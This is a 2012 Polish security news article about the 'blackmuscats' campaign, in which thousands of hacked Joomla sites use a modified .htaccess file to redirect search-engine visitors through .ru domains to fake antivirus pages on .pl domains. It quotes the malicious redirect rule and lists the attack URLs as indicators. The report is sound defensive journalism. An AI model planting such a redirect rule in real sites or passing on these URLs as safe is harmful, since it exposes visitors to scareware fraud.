02.08.2012 | 15:14

Adam Haertle

Fałszywy antywirus oferowany z polskich domen

Jak donosi firma Sucuri, kilka tysięcy serwerów pod kontrolą włamywaczy przekierowuje ruch na strony oferujące fałszywe oprogramowani antywirusowe, zarejestrowane w domenach z końcówką .pl.

Kampania nazwana „blackmuscats” (od ciągu występującego w przekierowywanych linkach) została po raz pierwszy opisana przez Sucuri wczoraj. Odkryto przynajmniej 17 tysięcy serwisów internetowych, które poprzez zmodyfikowany plik .htaccess przekierowują cały ruch przychodzący do stron serwujących fałszywe oprogramowanie antywirusowe. Sam atak wg istniejących doniesień prawdopodobnie wykorzystuje błędy w jednym z modułów Joomli (com_jce) i pozostawia na serwerze tylne furtki w php, umożliwiające przywrócenie zmian w razie naprawienia ich przez właściciela serwisu.


Okno wyświetlane przez fałszywego antywirusa

Przykładowy zmodyfikowany plik .htaccess:

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|..suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://moisupas.ru/blackmuscats?5 [R=301,L]

Plik oznacza, że każdy użytkownik, wchodzący na stronę z wyszukiwarki (co zabezpiecza przed zbyt szybkim odkryciem przez właściciela lub regularnego gościa witryny), zostanie przekierowany na stronę atakujących. Strony te znajdują się w domenie .ru – poniżej lista najczęściej występujących adresów:

1251 przypadków http://fitnes-corp.ru/shurimuri?5
1093 przypadków http://infofitnes.ru/interactive?5
818  przypadków http://fitnes-company.ru/interactive?5
817  przypadków http://mir-fitnes.ru/interactive?5
802  przypadków http://info-fitnes.ru/interactive?5
788  przypadków http://fitnescompany.ru/interactive?5
268  przypadków http://fitnes-corp.ru/shurimuri?5
220  przypadków http://infofitnes.ru/interactive?5
188  przypadków http://cofitnes.ru/mimosa?5

Każdy z tych adresów przekierowuje z kolei na domenę docelową, gdzie znajduje się fałszywy antywirus. Co ciekawe, dzisiaj na liście stron hostujących fałszywego antywirusa pojawiło się kilka domen z końcówką .pl.

http://www1.vulnerabilitytoolssolver.pl/18o8e9/al/1fedfba29dd0193d/pr2/0/
http://www1.antivirusworrydanger.pl/370l3591/al/1fedfba29dd0193d/pr2/0/
http://minimizerprocessesdebugger.pl/b6l1s/al/78dee9e271084cb2/pr2/238/
http://www1.stabilityprotectionscanner.pl/n9044s5/al/1fedfba29dd0193d/pr2/0/
http://centercleanerdebug.pl/040k1f746x/al/68efd410a6a48b3c/pr2/2/
http://custodiandatainspection.pl/58rjfku4/al/78dee9e271084cb2/196/
http://wreckavverify.pl/51d7ie889/al/fdd91a64ce20e17d/pr2/

To dość interesująca tendencja – nie pamiętamy, kiedy ostatnio polskie adresy były w ten sposób wykorzystywane przez atakujących.

Powrót

Zostaw odpowiedź

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Fałszywy antywirus oferowany z polskich domen

Komentarze